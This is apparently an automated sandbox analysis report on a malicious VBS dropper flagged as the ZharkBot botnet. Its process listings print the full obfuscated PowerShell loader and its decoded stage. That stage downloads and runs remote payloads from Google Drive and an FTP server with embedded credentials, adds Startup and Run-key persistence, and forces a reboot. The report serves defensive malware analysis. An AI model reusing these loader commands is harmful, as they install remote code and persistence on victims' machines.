Malware Analysis Report

2024-10-19 06:39

Sample ID 240919-nhpxlawapa
Target AT000005112563923.vbs
SHA256 596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23
Tags
execution zharkbot botnet defense_evasion discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23

Threat Level: Known bad

The file AT000005112563923.vbs was found to be: Known bad.

Malicious Activity Summary

execution zharkbot botnet defense_evasion discovery persistence

ZharkBot

Detects ZharkBot payload

Blocklisted process makes network request

Checks computer location settings

Drops startup file

Indicator Removal: File Deletion

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-19 11:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-19 11:24

Reported

2024-09-19 11:26

Platform

win7-20240708-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"

Signatures

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AT000005112563923.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AT000005112563923.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\Logs\DPX\setupact.log C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\Logs\DPX\setuperr.log C:\Windows\system32\wusa.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 2440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 2720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 2720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 2720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wusa.exe
PID 2828 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wusa.exe
PID 2828 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wusa.exe
PID 2720 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs');powershell $IedxR

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart

C:\Windows\system32\wusa.exe

"C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"

Network

N/A

Files

memory/2440-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

memory/2440-5-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2440-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 742bacb4eca96696026953673a08ec17
SHA1 601aa9e4a9d67c6d9c654b215c46c740e1b9eae1
SHA256 43aecfd8f08df366cce2cac95315f682db10ab19023bfaa7a6d61e60aa4b08d5
SHA512 78818d0d19c339edf1255060f5fe92ddc755a71c1651a391937a672646fa906b9f5029ac3c383b9be5575523673a63feec77e3335f3b8d48d5d08022c247ee4a

memory/2440-13-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2440-12-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2440-26-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2440-27-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-19 11:24

Reported

2024-09-19 11:26

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"

Signatures

Detects ZharkBot payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZharkBot

botnet zharkbot

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_q = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\iocpf.ps1' \";exit" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1592 set thread context of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
